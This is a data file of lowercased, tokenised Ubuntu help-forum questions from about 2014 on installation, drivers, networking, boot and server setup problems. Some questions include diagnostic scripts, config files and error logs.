423928	installing freeglut3-dev on ubuntu 12.04.4	i 'm a fairly new ubuntu user and have been trying to get the cuda toolkit installed for a project . i 've been following this guide : http : //pastebin.com/fdpqvsi5 to try and get it installed correctly , but i keep running into an issue when trying to install `` freeglut3-dev '' . i have followed the guide i linked on a fresh ubuntu 12.04 install up to installing the libraries needed for the cuda samples . i tried using : sudo apt-get install freeglut3-dev but get the following error : the following packages have unmet dependencies . freeglut3-dev : depends : libgl1-mesa-dev or libgl-dev depends : libglu1-mesa-dev but it is not going to be installed or libglu-dev e : unable to correct problems , you have held broken packages . when i try and install libgl1-mesa-dev or libglu1-mesa-dev a seemingly endless chain of dependencies is required which creates more dependencies for freeglut3-dev as well . the guide i am following is for ubuntu 12.04.3 , would there have been a change which means i need to do something different now ? any help much appreciated , thanks .
423931	ubuntu flashes and hangs at checking battery status	when i try starting up ubuntu , it goes past the boot up screen and then the words 'checking battery status ' comes up with the words ' [ ok ] ' this only comes up for a little while and then the screen flashes into the ubuntu start up purple and then reverts back to checking battery status . i have tried looking up how to fix this and came across a few similar questions . most of the answers said to press alt-f5 or i think ctrl-alt-f1 i have tried to log in using these commands and i do see the terminal log in screen come up for a flash of a second but it then flashes again and reverts back to checking battery status [ ok ] hopefully that made a little sense ? if not i 'll try to explain it a little better later . so my question is , is there away around this or do i have to completely reinstall ubuntu ? thanks in advance for any answers .
423932	gpu temp is weird ?	i am not sure if this has anything to do with it but i just upgraded my kernel in ubuntu 13.10 from 3.11.0-15 to 3.11.0-17 . i never thought about temperatures before but i just decided to download a monitor to see what the temperatures were . i have a amd radeon 4870 which at idle will sit at 84-86 celsius . the weird thing is that even when i am playing a game like counter strike my gpu temp will stay at about 87-88 celsius which is not much higher than at idle . counter strike is a pretty graphically intense game . maybe it is just the temp that my card like to be at . even when i put my fans from low to medium the temperature stayed the same . should i be concerned at those temperatures or is it not that big of a deal ?
423933	ubuntu 13.10 download crashes at the end , flashing cursor on start up	i just ( tried ) to install linux/ubuntu for the first time . i am using an asus laptop k52jr with windows 7 64bit on the c disk . i was happily installing ubuntu 13.10 onto my d disk ; the progress installation bar practically reached the very end before thing changed to a black screen with about 5 or so lines of white writing in the top left corner , and then my laptop automatically shut down . on starting the computer again i was taken to a screen where i can choose to boot in ubuntu or windows ( with several other options , such as `` ubuntu advanced options '' ) . when choosing ubuntu i am taken to a black screen with a flashing cursor . i can type stuff in there , although i have no idea what is going on . i attempted ctrl+alt+delete as one of several attempts to close things down so that i did n't have to a hard shut down . that worked , but first i got a `` warning fake initctl '' ( or something like that ) that repeated a number of times before i was sent back to the screen where i get to choose to boot in ubuntu or windows . i used linux live usb creator to install ubuntu via a usb . any ideas on where i go from here to get things working ?
423935	ubuntu 13.10 realtek 8723 wireless card stopped working	i have a zoostorm intel i5 laptop which came with a realtek 8723 wireless card . i had to compile the driver initially in 12.04 but now i 'm using 13.10 and it seemed to work fine . however it stopped working approximately two weeks ago . any suggestions would be welcome. ' filebase= '' wireless-info '' modmatches= '' ( air|ar5|ath|carl|at7|iwl|ipw|rtl8|rt2|rt3|8192cu|8192du|rt5|rt6|rt7|rtl|r818|r871|ssb|wl|b43|bcma|brcm|eth1|ndis|wlan0|firm|etork ) [ ^ [ : punct : ] ] '' exec 3 > & 1 4 > & 2 exec 1 > $ filebase.txt 2 > /dev/null if [ `` $ ? '' ! = `` 0 '' ] ; then printf `` \ncould not write target file \ '' $ filebase.txt\ '' , aborting.\n\n '' exit 1 fi printf `` \n****** info trace ******\n '' printf `` \n** uname -a *\n\n '' uname -a printf `` \n*** lsb_release *\n\n '' lsb_release -idrc printf `` \n*** lspci *\n\n '' lspci -nnk | grep -ia2 net printf `` \n*** lsusb *\n\n '' lsusb printf `` \n*** pcmcia card info *\n\n '' pccardctl info printf `` \n*** iwconfig *\n\n '' iwconfig printf `` \n*** rfkill *\n\n '' rfkill list all printf `` \n*** iw reg get *\n\n '' iw reg get printf `` \n*** route -n *\n\n '' route -n printf `` \n*** lsmod *\n\n '' lsmod | egrep `` ( ^| [ [ : punct : ] ] ) $ { modmatches } ( [ [ : punct : ] ] | $ ) '' printf `` \n*** nm-tool *\n '' nm-tool printf `` \n*** networkmanager.state *\n '' cat /var/lib/networkmanager/networkmanager.state printf `` \n*** networkmanager.conf *\n\n '' grep -v '^ # ' /etc/networkmanager/networkmanager.conf if [ -f /etc/networkmanager/nm-system-settings.conf ] ; then printf `` nm-system-settings.conf ( used up to 10.04 ) : \n '' grep -v '^ # ' /etc/networkmanager/nm-system-settings.conf fi printf `` \n*** interfaces *\n\n '' cat /etc/network/interfaces | sed -r 's/wpa-psk [ [ : graph : ] ] +/wpa-psk /' printf `` \n*** iwlist *\n\n '' if [ -t 0 ] ; then sudo iwlist scan || echo `` aquiring of root rights failed . '' elif [ -x /usr/bin/gksudo ] ; then gksudo iwlist scan || echo `` aquiring of root rights failed . '' elif [ -x /usr/bin/kdesudo ] ; then kdesudo iwlist scan || echo `` aquiring of root rights failed . '' else echo `` no way to aquire root rights found . '' fi printf `` \n*** resolv.conf *\n\n '' grep -v '^ # ' /etc/resolv.conf printf `` \n*** blacklist *\n '' for conffile in /etc/modprobe.d/.conf ; do if [ [ -n $ ( egrep -v '/etc/modprobe.d/ ( alsa-base|blacklist- ( firewire|framebuffer|modem|oss|watchdog ) |fglrx|nvidia ) ' < < < $ conffile ) ] ] ; then blacklist= $ ( grep '^blacklist ' $ conffile ) if [ -n `` $ blacklist '' ] ; then printf `` \n [ % s ] \n % s\n '' $ conffile `` $ blacklist '' fi fi done printf `` \n** modinfo *\n\n '' modulnames= $ ( lsmod | egrep `` ^ $ modmatches '' | awk ' { print $ 1 } ' ) for module in $ modulnames ; do modinfo $ module echo done printf `` \n*** udev rules *\n '' egrep '^ ( # .device| [ ^ # ] | $ ) ' /etc/udev/rules.d/70-persistent-net.rules printf `` \n** dmesg *\n\n '' dmesg | egrep `` [ [ : punct : ] ] $ { modmatches } [ [ : punct : ] ] '' printf `` \n******** done ********\n\n '' exec 1 > & 3 3 > & - exec 2 > & 4 4 > & - sed -r -i 's/ ( [ [ : alnum : ] ] [ [ : alnum : ] ] : ) { 5 } [ [ : alnum : ] ] [ [ : alnum : ] ] // ' $ filebase.txt if [ $ ( stat -c % s $ filebase.txt ) -gt 19968 ] ; then tar -czf $ filebase.tar.gz $ filebase.txt rm -f $ filebase.txt printf `` \nresults archived in \ '' % s.tar.gz\ '' , as they exceed the 19.5 kb size limit for .txt files on the ubuntu forums.\n\n '' `` $ filebase '' else printf `` \nresults saved in \ '' % s.txt\ '' .\n\n '' `` $ filebase '' fi '
423936	how to prevent right-click opening new terminal instance	i often copy text into the terminal , for instance from a website or for a particularly difficult to spell filename , when i right-click the terminal to paste things however one of two thins will happen : the menu will appear or a new terminal will open . how can i prevent the latter behavior ?
423938	please tell me what ubuntu actually does ?	please tell me what ubuntu actually does ? is this an operating system ?
423942	change password on root user and user account	just want to ask , if i change the password on the root user , is that going to automatically change the password to on the user account ? i found this link to change the root user http : //www.wikihow.com/change-the-root-password-in-linux how do i change the user account password ?
423945	unable to access the internet on poweredge 1850	i 've successfully installed ubuntu server on a dell poweredge 1850 but am having some problems with networking . for a few hours after installation , i could successfully connect to the internet , but i no longer can . although i can ping 192.168.1.1 and other local network nodes , i can not connect to 8.8.8.8 . any pointers for help ?
423946	unattended installation xubuntu	i 'm trying to setup an unattended install of xubuntu 13.10 . it currently picks up all the settings but it still requires me to click next on each screen . i understand editing the xubuntu.seed is n't best practice however i 'm just trying to get it to get working . i have tried automatic-ubiquity and priority=critical but neither seems to make a difference ; i have a feeling the install process is being called from somewhere else , bypassing these settings . txt.cfg default live-install label live menu label ^try xubuntu without installing kernel /casper/vmlinuz append file=/cdrom/preseed/xubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- label live-install menu label ^install preseed xubuntu 13.10 kernel /casper/vmlinuz append file=/cdrom/preseed/xubuntu.seed boot=casper languagechooser/language-name=english countrychooser/shortlist=nz localechooser/supported-locales=en_us.utf-8 automatic-ubiquity initrd=/casper/initrd.lz quiet splash priority=critical -- label check menu label ^check disc for defects kernel /casper/vmlinuz append boot=casper integrity-check initrd=/casper/initrd.lz quiet splash -- label memtest menu label test ^memory kernel /install/mt86plus label hd menu label ^boot from first hard disk localboot 0x80 xubuntu.seed # enable extras.ubuntu.com . d-i apt-setup/extras boolean true # install the xubuntu desktop . tasksel/first multiselect xubuntu-desktop d-i console-setup/ask_detect boolean false d-i console-setup/layoutcode string us d-i debian-installer/language string en d-i debian-installer/country string nz d-i debian-installer/locale string en_nz.utf-8 d-i time/zone string pacific/auckland d-i mirror/http/mirror select nz.archive.ubuntu.com d-i clock-setup/ntp boolean true d-i netcfg/choose_interface select auto d-i netcfg/get_hostname string xubuntu-undefined d-i grub-installer/only_debian boolean true d-i passwd/user-fullname string administrator d-i passwd/username string user d-i passwd/user-password-crypted password $ 1 $ d8xyolis $ ndctvhsk5r0uenyvvjk.d0 d-i passwd/auto-login boolean true d-i finish-install/reboot_in_progress note d-i preseed/late_command string echo 'x11vnc -usepw -forever ' > > /etc/rc.local ; chmod +x /etc/rc.local ; apt-get install remmina , x11vnc for safety , i have n't specified whether to automatically format sda until its ready .
423947	chromium renamed after using youtube webapp	using ubuntu 13.10. with chrommium browser . after uninstalling the youtube webapp , my chromium was renamed to 'youtube ' although it acts as a normal browser . dash search for 'chromium ' or 'youtube ' both return the same icon - chromium named 'youtube ' . also , right click context menu for the app says 'youtube ' instead of offering to open normal/incognito windows . so far , i 've been unsuccessful in finding the solution on my own or on the web.. tried removing/purging/reinstalling both chromium and youtube webapp with restarts inbetween . it 's not a terrible issue since everything is basically working fine , but i 'd like to know how to fix it anyways . it mostly just feels bad : ) any ideas ? thanks
423949	my computer is lagging and giving an i/o error	so , heres the deal , i got my cpu from a friend who works in robotics april 14th 2013 , and now february 20th 2014 , less than a year later , it has ceased to cooperate . i was playing minecraft this morning but i had to go to the grocers so i logged off ( left the launcher open ) and put the cpu to sleep . all was well , absolutely nothing out of the ordinary . i came back and the cpu had shut itself down . the battery was n't dead , i had left it plugged in , but all the lights were off . in total it takes about an hour to go from shut down , to get to my desktop , where as this morning it took about 30 seconds . the first thing it does is go to the terminal , and it stays and blinks for a minute , but then it gives me this insane sequence : ata1.00 : exception emask 0x0 sact 0x7 serr 0x0 action 0x0 ata1.00 : irq-stat 0x40000008 ata1.00 : failed command : read fpdma queued ata1.00 : cmd 60/08:08:50 : ad : ef/00:00:2b:00:00/40 tag 2 ncq 4096 in res 51/40:08:50 : ad : ef/00:00:2b:00:00 emask 0x409 ( media error ) < f > ata1.00 : status : { drdy err } ata1.00 : error : { unc } end_request : i/o error , dev sda , sector 737127760 sooo , some of the numbers in the middle part are n't right because they were constantly changing . after it repeats this message about 100 times it goes completely black for quite some time then lets me log in , goes black for a while more , lets me click one thing , and then freezes up . yhis is as far as i 've gotten with it , and we 're no longer on speaking terms . i would like ( if possible ) to keep the data on this , but if it must go then indeed it must .
423950	can i catch a virus if i have a super user account and i switch to my normal one ?	hey i 'm 14 ( i do n't know alot ) and the reason i rooted my ubuntu is to install a theme , but i wonder , can i catch a ubuntu virus if i am in my normal account ?
423954	ubuntu-html5-theme package does not install ubuntu-html5-app-launcher	the package ubuntu-html5-theme ( which gets installed as part of the ubuntu-sdk ) does not install ubuntu-html5-app-launcher . however if i download the source for this package and build and install it does install the ubuntu-html5-app-launcher however running it gives this issue : file : ///usr/local/share/ubuntu-html5-app-launcher/qml/main.qml:23:1 : type webappcontainer unavailable webappcontainer { ^ file : ///usr/lib/x86_64-linux-gnu/qt5/qml/ubuntu/webapps/webappcontainer.qml:21:1 : module `` ubuntu.components.extras.browser '' is not installed import ubuntu.components.extras.browser 0.1 ^
423959	why does upstart work on 64 bit but not on 32 bit ?	i hope someone with better skills on linux can give me any clue or answer this . i have an upstart service , which has been running successfully on ubuntu 12.04 server 64 bit . today i have setup a vm running ubuntu 12.04 32 bits and when i run it , running shows on the screen , but the service is not running . i have checked the syntax of my config.conf file using this command : init-checkconf /etc/init/myservice.conf there are no syntax errors whatsoever and it makes sense since this same service has been running for long time without issues . to make sure , i created a vm running the same ubuntu 12.04 but in 32 bits and it just wo n't start . no log , no warnings , no syntax error , nada . here is the script , it is really simple launcher of mono application . i have ran this same application from the command line before on 32 bits and it works great . log does n't write anything either . description `` api.alogimex listener service '' author `` mauricio leyzaola / mauricio.leyzaola @ gmail.com '' start on ( local-filesystems and net-device-up iface=eth0 ) stop on shutdown respawn respawn limit 99 5 script cd /home/mleyzaola/mono.apps/alogimex.api.deploy exec mono alogimex.host.exe -database alogimex 2 > & 1 > > /var/log/api.alogimex.log end script
423962	how to sync time ubuntu desktop 13.10 client with centos6.4 server using ntp	i have ntp server setup on my centos6.4 server and am trying to sync my ubuntu 13.10 desktop ( amd ) client with it . i figured this would be easy having heard positive things about ubuntu but it 's not as easy as the instructions indicate . according to https : //help.ubuntu.com/community/ubuntutime i should perform the steps below . the problem is there is no `` system menu on the top panel '' . even the command line info is unclear . i use centos and redhat daily but this is my first time using ubuntu . please help . using the gui this is how to enable ntp time synchronization using the gui ( graphical user interface ) . click on the system menu on the top panel , go into the administration sub-menu , and click on date and time . select the configuration option keep synchronized with internet servers
423965	permanently pin printer indicator to top toolbar ?	is there an indicator applet that i can pin to my toolbar which will allow me to view print jobs that are queued for printing ?
423968	wnda3100v2 on ubuntu 13.10 x64	im having issues where no drivers work on ubuntu 13.10 and using the wnda3100v2 wifi adapter and ndiswrapper . please help . fyi drivers say device present
423970	how to check if alias is not replacing an actual command ?	how can i know if an alias i make ( in .bash_aliases ) is not replacing an actual command by same name ? i do n't want to do such things by accident . ( i looked in `` questions that may already have your answer '' and `` similar questions '' but did not see matches ) i 'm asking because i feel there is no warning given by the system ( ubuntu 13.10 ) .
423971	can i change the commands certain buttons activate on my dell wm514 mouse ?	i can open synapse by using the right/left bumper ( is that what you call it ? ) +drag left . are there certain files to edit , or do i have to download certain software ?
423975	ubuntu wo n't load on stand alone hard drive	i am attempting to try ubuntu 12.04 64-bit . from 8gb flash drive ( downloaded via universal usb installer ) . i get as far as the try ubuntu option then i get a screen full of errors . have tried to run ubuntu 13.10 ( 64 bit ) on a stand alone hard drive , but it can not find boot . have seen mention of something called grub and grub2 , but have n't seen any download links . system : windows 7 home premium 64-bit sp1 cpu/amd phenom ii x4 840 ram/16.0gb dual-channel ddr3 @ 803mhz motherboard/gigabyte technology co. , ltd. ga-ma785gpmt-ud2h
423976	how to boot in recovery mode ? it 's not in the menu	i installed the nvidia drivers and now i have a black screen , so i need to boot in recovery mode to fix it , because ctrl + alt + f1 shows a black screen too . but for some reason the recovery mode is not in the grub menu . if i press 'c ' i can get a grub command line . so what 's the command for booting ubuntu in recovery mode ?
423977	can not turn wireless networking off	i wish to disable my wireless networking because i have a wired network connection . i am using ubuntu 12.04 . in the menu at settings > network > wireless there is an option to press a switch which toggles on/off . if i press this button , my wireless will toggle off . however , it has n't actually toggled off . i do n't lose the wireless ip address . if i close the menu and open it again , the toggle is set back to `` on '' . i can disable my wired network just fine . my wireless network , however , will not stay off . the user account is an administrator .
423981	ca n't mount hfs+ drive , bad superblock ?	my macbook ( snow leopard os ) was giving me the rainbow wheel of death so i tried booting into safe mode and repairing the disk , with no luck . so i decided to pull the drive out and plug it into my ubuntu 12.04 desktop with a sata to usb cable to recover some data before reinstalling the os . i 'm having a lot of trouble trying to mount the drive . i have installed hfsplus hfsprogs and hfsutils and run the following command . sudo mount -t hfsplus /dev/sdd1 /mnt/ '' applemount '' which gives me this error . wrong fs type , bad option , bad superblock on /dev/sdd1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so running dmesg tells me this . [ 39666.815423 ] end_request : critical target error , dev sdd , sector 536 [ 39666.815429 ] buffer i/o error on device sdd1 , logical block 62 [ 39670.526393 ] sd 6:0:0:0 : [ sdd ] unhandled sense code [ 39670.526397 ] sd 6:0:0:0 : [ sdd ] result : hostbyte=invalid driverbyte=driver_sense [ 39670.526402 ] sd 6:0:0:0 : [ sdd ] sense key : medium error [ current ] [ 39670.526407 ] sd 6:0:0:0 : [ sdd ] add . sense : unrecovered read error [ 39670.526412 ] sd 6:0:0:0 : [ sdd ] cdb : read ( 10 ) : 28 00 00 00 02 18 00 00 08 00 [ 39670.526422 ] end_request : critical target error , dev sdd , sector 536 [ 39670.526427 ] buffer i/o error on device sdd1 , logical block 62 [ 39763.562415 ] hfs : unable to find hfs+ superblock so i think i 'm stuck at this point . can anyone guide me in the right direction ? thank you !
423985	setup mail server in ubuntu server 13.10	for the past week i have been trying to setup a mail system capeable of understanding imap/s and smtp , but after digging though like hundreds of pages , i feel like writing letters again instead of sending emails . here 's my situation : my server is accessible though a domain ( let 's call it foobar.com ) . i want to create two addresses : admin @ foobar.com and office @ foobar.com , both completely seperated from each other . however , i am completely lost at i think dovecot and postfix . i am so lost i do not even know why it 's not working . ( this is usually not the kind of question i ask , but for the first time in linux i feel completely overwhelmed and have no remote idea of how to start ) edit : // i have now finally completed the referenced wiki guide and then followed the official dovecot wiki , but i can not connect via thunderbird this is my current dovecot.conf protocols = imap # it 's nice to have separate log files for dovecot . you could do this # by changing syslog configuration also , but this is easier . log_path = /var/log/dovecot.log info_log_path = /var/log/dovecot-info.log # disable ssl for now . ssl = no disable_plaintext_auth = no # we 're using maildir format mail_location = maildir : ~/maildir # if you 're using pop3 , you 'll need this : pop3_uidl_format = % g # authentication configuration : auth_verbose = yes auth_mechanisms = plain passdb { driver = passwd-file args = /etc/dovecot/users.conf } userdb { driver = static args = uid=vmail gid=vmail home=/home/vmail/ % u } the postfix config is completely default .
423986	who is behind lxle ?	i understand canonical is funding ubuntu , and that lubuntu at least has canonical 's endorsement . who funds and who manages lxle ? ( i could not find information on the lxle web site . ) for those who are n't aware , lxle is a `` respin '' of lubuntu , and stands for `` lubuntu extra life extension '' -- hence the reason the question is asked here .
423987	notes app with markdown support and android sync	i 've been looking for a way to take simple notes , like lists and reminders , in markdown and have it synced to my android . is there an app that has support for android and ubuntu , provides sync between them , and has markdown support ? right now i 'm using google keep , which has a nice interface but no markdown support and i 'm a firefox user on a low-powered computer , so having chromium and firefox open is not ideal . thanks .
423989	cant connect to wired connection ubuntu 13	made the following check dlujan @ dlujan-vostro-1000 : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:80 errors:0 dropped:0 overruns:0 frame:0 tx packets:80 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6544 ( 6.5 kb ) tx bytes:6544 ( 6.5 kb ) help please wired connection doesnt even show up on list when i go to networks
423991	editing fstab to allow permissions	i 'm simply trying to run an html file , but when i try ./filename.html i 'm given `` permission denied '' instead . i 've searched the internet and found that my fstab currently contains noexec . since that file is a bit messy and i am very new to ubuntu , i do n't know how to edit it so that i am allowed permission to open files . here is what my fstab file looks like : # /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a device ; # this may be used with uuid= as a more robust way to name devices that # works even if disks are added and removed . see fstab ( 5 ) . # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=5950afca-327d-4b3b-b23e-f59faf8ee6f1 / ext4 errors=remount # swap was on /dev/sda5 during installation uuid=daddf392-bb17-4dcc-99f1-e92991a366f6 none swap sw would anyone know how to fix this ?
423994	ca n't format usb drive in xubuntu 13.10	i have a computer running xubuntu 13.10 , and a flash usb drive kingston . my friend gave it to me and i do not know why the computer did not regconize it . here is the result after running sudo fdisk -l disk /dev/sdb : 7747 mb , 7747397632 bytes 239 heads , 62 sectors/track , 1021 cylinders , total 15131636 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 then i used gparted trying to format it , gparted said it is unallocated , and we ca n't created partition table on it . i also tried disk ultility but it crashed everytimes , with the error : error synchronizing after formatting with type `` dos ' `` : timed out waiting for object ( udisks-error-quark , 0 ) please help me to rescue it . thanks .
423996	install suggested packages via aptitude	i 've read installing suggest packages via apt-get , and i 've read how to look suggested and recommended packages from aptitude.. but then , how to install it all using aptitude ? best regards , ahmad
424000	x11 forwarding to osx	i 've successfully installed and enabled x11 forwarding.. according to these instructions . http : //forrestbao.blogspot.com/2008/01/connecting-your-remote-linux-desktop.html i first tried to connect via > ssh -x < username @ ipaddress > > gnome-session i get > ** ( gnome-session:4640 ) : warning ** : can not open display : later i found a suggestion to try > ssh -xc < username @ ipaddress > > gnome-session i was seeing a screen , but the unity menu that normally appears on the left was not visible . i am unclear what 's wrong here , but will attempt to restart the system in a minute . i have full root access and retried with sudo . nothing changed .
424001	have upstart job prevent different job from stopping	i 'm trying to find a way to have one upstart job , which is triggered when another job is stopping , from preventing that other job from really stopping . basically i have a service which runs , lets pretend apache , and i want to create another upstart job which will prevent that service from shutting down unless certain conditions are met . so i 've created a `` task '' job to perform a few checks , and then if those checks do n't pass , apache should not be allowed to shut down . i thought i could do something such as the following : start on stopping apache task script if some_condition ; then start -- no-wait apache fi end script but the other service still shuts down , it just gets immediately started back up . i ca n't have this , it must not shut down at all . i 've put a sleep statement in the above script , and it does delay the service from stopping . so if the service is still running , i would think i should be able to prevent it from shutting down .
424002	how to add an `` exit '' option to grub menu ?	i was trying to add windows to grub , but then i noticed that pressing 'c ' to go to the command line , and then typing exit will start windows . so instead of adding a complicated config for windows i would like to add an `` exit '' option to the grub menu . is that possible ? i 'm using grub customizer .
424005	unable to create a bootable usb drive on mac os x - problem with hdiutil	i 'm having trouble using hdiutil in terminal to create a bootable usb drive using the instructions found on the ubuntu site . i 'm running mac os x tiger . when i try using the command , it 's telling me that only a single input file can be specified . i dropped the file in my main directory ( wickedjill ) to make it easier , but it 's still not working . can someone please talk me through this ?
424006	how to make âsecureâ connection from jconsole to a remote server app in ubuntu ?	i can connect to my remote app in jconsole but i believe that is not a secure communication . since i am passing on the server access credentials , i want to make this a secure communication . how could i do that easily ? ca n't i use ssh protocol with jconsole ? is there any other alternative to jconsole that help achieving same goals but securely ?
424008	apache : new files and folders does not get correct permissions	this is what i 'm working whit . ubuntu server 13.10 /w kubuntu desktop 3.11.0-17-generic apache/2.4.6 ( ubuntu ) php 5.5.3-1ubuntu2.1 ( cli ) module suphp enabled my issues : i can install joomla , and it looks like its working , but i have to chmod -r 755 on the the root folder of the installation of joomla , in order to get everything to work like its supposed to . ( this is not an ideal solution for an server i 'm going to use for development of webpages . anyone have any toughs about were i can start to look , in order to get this issue resolved . [ core : error ] [ pid 3773 ] ( 13 ) permission denied : [ client 127.0.0.1:46801 ] ah00132 : file permissions deny server access : file permissions deny server access : /var/www/jostein/public_html/administrator/components/com_kunena/media/icons/large/categories.png , referer : http : //127.0.1.1/administrator/index.php ? option=com_kunena in /var/logs/apache2/error.log afther i install kuena in joomla . my solution are to : manually chmod -r 755 /home/jostein/www/public_html/administrator/components/com_kunena/ my viritual host conf file < virtualhost 127.0.1.1:80 > servername localhost serveradmin webmaster @ example.com documentroot /var/www/jostein/public_html suphp_engine on # suphp_usergroup jostein jostein addtype application/x-httpd-suphp .php .php3 .php4 .php5 .phtml suphp_addhandler application/x-httpd-suphp < /virtualhost > normally the # should't be in front of suphp_usergroup but if i remove it i get this error utput of config test was : ah00526 : syntax error on line 8 of /etc/apache2/sites-enabled/mysite.conf : invalid command 'suphp_usergroup ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information .
424009	installing ubuntu over windows8.1	i have windows 8.1 pre-installed in my laptop . but i really did n't like it . ubuntu is much better . i do n't have much knowledge related to how things are done . i want to install ubuntu in place of windows . but i also want a copy of my windows8.1 so that in future if i ever need i might install windows 8.1 again . i was not provided a windows 8.1 cd with my laptop .
424010	want to have e-mail contact for shotwell	i found some defects in shotwell . how do i inform the developers of shotwell ?
424011	ubunty 12.04 - file manager - searching fully `` all '' files/folders and sub-folders	i am very frustrated with the default file manager in ubuntu . i understand that the default file manager system is nautilus . when i want to search the entire file system for any particular word , string , whatever , the resulting search does not list everything that matches my search request . how can i make nautilus perform a full and complete search of all files/folders and sub-folders on my computer ? if nautilus will not do this , what , if any , alternative file manager will work ? i am use to the windows explorer file manager and would like to have a similar file manager for ubuntu .
424013	ubuntu server port 80 not reachable/closed	i am running ubuntu server 12.04 with apache2 . my port 80 is not reachable and closed . any idea how can i open it so i can access to my web admin ? i noticed that port 80 is reachable under lan , but its not able to reach outside of lan even i had done port forwarding . what should i do ? thanks .
424016	will erasing a parallel os ( using os-uninstaller ) free up the whole drive or do i need to adjust partitions ? [ solved ]	i 'm planning on removing windows 7 from my lenovo t500 and sticking with ubuntu 12.04 . i 'll use os-uninstaller to do the job . i 'm wondering if it will automatically delete the partitions and give all the space to ubuntu or is there further tweeking required ? are there any traps for the novice in undertaking this exercise ? is there a better way ?
424017	customizing workspaces	i want the following customizations in ubuntu 12.10 i will like to every work space to show a clear desktop ( i.e . the files in the desktop of workspace one should n't show up in workspace two etc ) . a new program will start in a new workspace ( e.g . if pdf is running in workspace one a new pdf in workspace two should just open a new pdf in worspace one ) . there should be a workspace indicator ( i think workspace indicator works ) . i have read through most of the questions here on workspace customizations and it did n't seem to help ( except workspace-indicator perhaps ) . any help is appreciated . thanks !
424020	where can i access man pages for `` aptitude '' if it is not on my system ?	sometimes i want to read man pages of programs i have not installed . then i visit ubuntu manuals . i entered aptitude in the search box but aptitude man pages are available only for lucid 10.04 lts and precise 12.04 lts . why is that ? is it because ubuntu prefers usage of apt-get over aptitude ? is there some other reason ? where else can i access man pages for specific for ubuntu if i do not have the respective software installed ? i know of http : //linux.die.net/man/8/aptitude but that is not specific for ubuntu , correct ?
424027	how do i login to a deployed virtual machine in azure ?	mongo db service is deployed in a azure virtual machine using ubuntu juju . how to login to the newly created virtual machine ?
424030	how to make a disk image and restore to another , the hardware between the servers are the same	currently there is an issue happening on the production environment and not happening in dev . so i would like to recreate it in dev by creating a image of prod and restore it in dev . the hardware are the same as well as the raid . my question is a. what the best tool to use to do that ? b. when creating the image , does it require any downtime ? c. i presume that i need to do some configuration changes once the restore is done ? d. after the restore , would the logic/physical mount be eased ? plus i am new to ubuntu , have tried tar way to do . it seems that it caused lots of issues . i have gave up on that due to time limitation . thank you so much . bing
424032	any way to permanently skip the updates in ubuntu 13.04 ?	in the software updater , i 've came across several packages like firefox and libreoffice.i do n't use either of them . so every time , i had to check it out during update . is there any way to permanently skip those packages and complete the update or i 'll have to update even though there is no use .
424037	wanting to install the pantheon desktop environment within ubuntu , is it still dangerous to try to install it or has a stable version been released ?	dangerous as in breaking certain elements of ubuntu ( or installed desktop environments ) ? actually i was looking though a list of all ( or most ) desktop environments available for ubuntu and pantheon looks quite interesting so i thought i would install it and give it a try . usually i tend to do a bit of research before installing desktop environments so that i do n't end up with a desktop environment i hate or end up just leaving to `` collect dust '' . i know you can uninstall des , but there are some things that sometimes can not be simply uninstalled without going through some sort of hassle to remove , that 's why i 'm cautious before deciding to install some things . anyways ... .back on topic ... . one thing that seemed to be a reoccurring theme when searching topics/posts etc . was that people were experiencing problems after installing the pantheon shell/de ( whichever one it actually is ) . they seemed to be running into pantheon breaking something on their ubuntu installation . but all of the posts/threads etc . that i looked at or found were from 2013 or earlier . so that leads me to my question : has a `` version '' of pantheon been released that is stable ( or at least stable enough ) that does n't end up breaking something of my ubuntu ( ubuntu 13.10 ) installation ( including the additional desktop environments i 've downloaded ) ? if it 's a yes to # 1 , how would you go by installing it from the terminal ?
424038	uninstall a pre-installed ubuntu 12.04 to replace it with dual boot of windows 8.1/ubuntu 13.10	my dell inspiron 15 came with a pre-installed ubuntu 12.04 . now i want to remove that and replace it with windows 8.1 ( enterprise ) and unbuntu 13.10 . i have created two bootable usb sticks for both of these os . when i search for this kind of scenario it always leads me to this question : how to remove ubuntu and put windows back on . but this is not my question , as i do n't have any windows on my pc currently . following is what i tried : ? ? clueless from here for what to do ? ? i tried to format one of the partitions myself which named as os ( 3.2 gb ) . i know that possibly i have done some harm , but it has happened . now that partition is named as `` primary '' ( as seen in the image above ) . now sometimes when i switch on my pc , it gives me an error `` no media found '' . but half of the time it boots to the ubuntu as it was happening earlier ! so my main goal is : uninstall the ubuntu 12.04 completely ( this came by default ) clean install windows 8.1 enterprise dual boot the same with ubuntu 13.10 the 1st step is the most crucial . help would be appreciated .
424042	what is the first step on ubuntu 12.04 on laptop	am new on ubuntu and i would like to know what i would have to do first after installing ubuntu . i had ubuntu before but i removed it because my laptop was getting so hot ; but now i want to try it again . any help is welcome . thankyou . specs : lenovo y470 , procesador : intel ( r ) core ( tm ) i7-2630qm cpu @ 2.00ghz , 8gb ram , 64 bits
424043	unity dash move launchers issue	i have ubuntu 12.04 x64 at work and ubuntu 12.04 x 86 at home . at ubuntu x64 i can move launchers out of frame while moving them up or down ( like on a picture ) , bu at ubuntu x86 i can only move up or down directly .
